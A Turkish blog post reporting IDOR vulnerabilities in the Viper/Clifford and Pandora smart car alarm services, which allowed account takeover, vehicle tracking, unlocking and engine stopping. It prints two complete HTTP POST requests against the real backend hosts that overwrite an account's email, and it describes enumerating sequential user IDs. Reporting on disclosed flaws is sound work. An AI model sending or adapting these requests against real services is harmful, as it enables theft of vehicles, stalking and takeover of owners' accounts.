Hacktime: Akıllı araba alarm sistemlerindeki zafiyet

Mayıs 7, 2019
0 Paylaşımlar

Bugünkü yazımda sizlerle akıllı araba alarm sistemlerindeki zafiyeti paylaşacağım. Araştırmacılar, dünyadaki 3 milyon kullanıcıya tehdit oluşturan iki popüler alarm sisteminde güvenlik açıkları buldular.

Güvenlik açığı bulunan alarm sistemleri Viper ve Pandora’ya aittir. Her iki sistem de bilgisayar korsanlarının alarm sistemlerini tehlikeye atmasına sebebiyet veren kritik zafiyetler bulunmaktadır ve arabanın kontrolünü ele geçirmesine izin verebilmektedir. Viper (İngiltere’de ‘Clifford’ markalı) ve Pandora dünyadaki en büyük araba alarmı markalarından ikisini temsil ediyor. Ve bu iki firma daha önce yaptığı açıklamalarda bizim sistemlerimiz kesinlikle hacklenemez mottolarıyla ve reklamlarıyla piyasada yer alıyordu. Yine bu durum bize hacklenemez bir sistem yoktur gerçeğini gösteriyor.

Korsanlar geliştirdikleri bir exploit ile araç alarmlarını devre dışı bırakma, araç kilidini açma, immobilizeri etkinleştirme / devre dışı bırakma, gerçek zamanlı konum izleme, araç motorunu aniden durdurma, araç sahipleri ve araçların ayrıntılarına erişim sağladılar.

Şaşırtıcı bir şekilde, güvenlik açıkları, API içindeki doğrudan nesne referansları (IDOR’lar) basit ve güvensizdir. Sadece parametreleri değiştirerek, hesaba kayıtlı olan e-posta adresini kimlik doğrulaması yapmadan güncelleyebilir, değiştirilen adrese (yani saldırganın) bir şifre sıfırlama gönderebilir ve hesabı devralabilir.

Belirli bir aracı coğrafi olarak konumlandırmak ve takip etmek, sonra kapıların durmasına ve kilidini açmasına neden olabilir. Bu şekilde otomobilin kaçırılması çok kolaydır.

Viper Alarm Sistemi Zafiyeti:

Üçüncü bir parti olan CalAmp, Viper Smart Start alarmı için arka uç servis sağlar. Güvenlik açığı, ‘kullanıcıyı değiştir’ isteğindeki bir IDOR’dur. Diğer tüm API’ler yetkilendirmeyi doğru bir şekilde kontrol etse de, / users / Update / xxxxx isteği doğru şekilde doğrulanmıyor.

Bu nedenle, herhangi bir kullanıcı şifresini değiştirmek için kötü niyetli bir istek yayınlayabilir ve alarmla etkileşime izin vererek giriş yapabilirsiniz. Gerçek araç sahibi hesabı kilitlendi ve alarmlarına erişimi kesildi.

Örnek bir istek:

POST /users/Update/861772 HTTP/1.1
Host: colt.calamp-ts.com
Connection: close
Content-Length: 342
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://colt.calamp-ts.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://colt.calamp-ts.com/dashboard/home
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: __utma=36020146.382676338.1549803856.1549803856.1549803856.1; __utmc=36020146; __utmz=36020146.1549803856.1.1.utmcsr=medium.com|utmccn=(referral)|utmcmd=referral|utmcct=/@evstykas/remote-smart-car-hacking-with-just-a-phone-2fe7ca682162; kohanasession=flrd2pb6lcqohnu3ld79p9oif7; __utmt=1; __utmb=36020146.8.10.1549803856FirstName=f&LastName=l&Email=user%40mail.com&Phone=123+132-1321&UserName=user%40mail.com&Password=!Password1&Language=English&Measurement=Imperial&Timezone=Etc%2FGMT%2B8&Pincode=0&Question=What%2Btown%2Bwere%2Byou%2Bborn%2Bin%253F&Answer=no&MsgFlag=0&DaylightSavings=0&CustomAttributes=%5B%5D&SessionId=flrd2pb6lcqohnu3ld79p9oif7

Pandora Alarm Sistemi Zafiyeti:

Güvenlik açığı, POST isteğinde bulunan bir IDOR: ’email’ JSON parametresinde https://pro.p-on.ru/api/sputnik/workers?id=xxxx.


POST /api/sputnik/workers?id=xxxxx HTTP/1.1
Host: pro.p-on.ru
Connection: close
Content-Length: 167
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://pro.p-on.ru
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/json
Referer: https://pro.p-on.ru/workers/185000
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: lang=en; sid=4020f4ba21edb3082902e227937995d6{"id":xxxxx,"name_f":"name","name_i":"name_i","name_o":"name_o","groups":[],"email":"newemail","type":"user","company_perms":0}

Bu nedenle, bir kişi mevcut e-postanın üzerine, kontrol ettiğiniz ve parola sıfırlama işlemi yaptığınızın üzerine yazabilir. Parola sıfırlandıktan sonra, uygulamaya kolayca giriş yapılabilir ve tam işlevsellik elde edilebilir. Bu saldırı aynı zamanda birden fazla araca erişim sağlayabilecek yönetici kullanıcılarına karşı da kullanılabilir. Çevrimiçi olarak da önemli miktarda veri sızıntısı var. Sıralı kullanıcı kimliğinizi ‘xxxxx’ – https://pro.p-on.ru/workers/xxxxx yerine koymanız yeterli, bu şekilde verilere ulaşılabiliniyor.

0 Paylaşımlar
Yazı Etiketleri:
· ·

Yorumunuz

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

− 2 = 2

error: 5846 Sayılı Fikir ve Sanat Eserleri Kanunu gereğince içerikler kopyalanamaz.
0 Paylaşımlar
Paylaş
Paylaş
Tweetle